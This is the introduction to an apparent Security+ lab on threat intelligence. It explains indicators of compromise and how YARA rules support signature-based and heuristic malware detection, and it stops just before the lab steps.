03_Threat_Intelligence

For this lab, you’ll need a Ubuntu machine and a separate Kali Linux machine.

The machine from labs 1 and 2 is required. Yara must be installed correctly.

Key Sec+ Term: Indicators of Compromise

Indicators of Compromise (IoCs): IoCs are pieces of information that can be used to identify potentially malicious activity on a system or network. Examples of IoCs include specific file hashes, IP addresses, URLs, and specific strings or patterns of data.

YARA's Capability:

YARA is a versatile tool that allows researchers and security professionals to create rules based on textual or binary patterns. This means that YARA rules can be written to match on specific IoCs, such as a particular file hash or a specific string that is indicative of malware.

Beyond IoCs:

While YARA can match on IoCs, its capabilities extend beyond just matching simple indicators. YARA rules can be crafted to identify more abstract patterns or characteristics of malware or other threats. This might include specific combinations of behaviors, or other attributes that are indicative of a particular malware family or technique, even if they aren't tied to a specific, known IoC. This makes YARA valuable for both (Key Sec+ Term) signature-based detection (matching known IoCs) and (Key Sec+ Term) heuristic or behavior-based detection (identifying potential threats based on patterns or characteristics).

YARA rules can indeed match on IoCs, but they can also be crafted to identify threats in a more abstract or heuristic manner, making them a powerful tool for threat detection and research.

Click on this list of intelligence feeds.

Keep in mind these are all open-source rulesets. Many may not have been updated for some time.

Untitled

In this lab, we’ll do the following: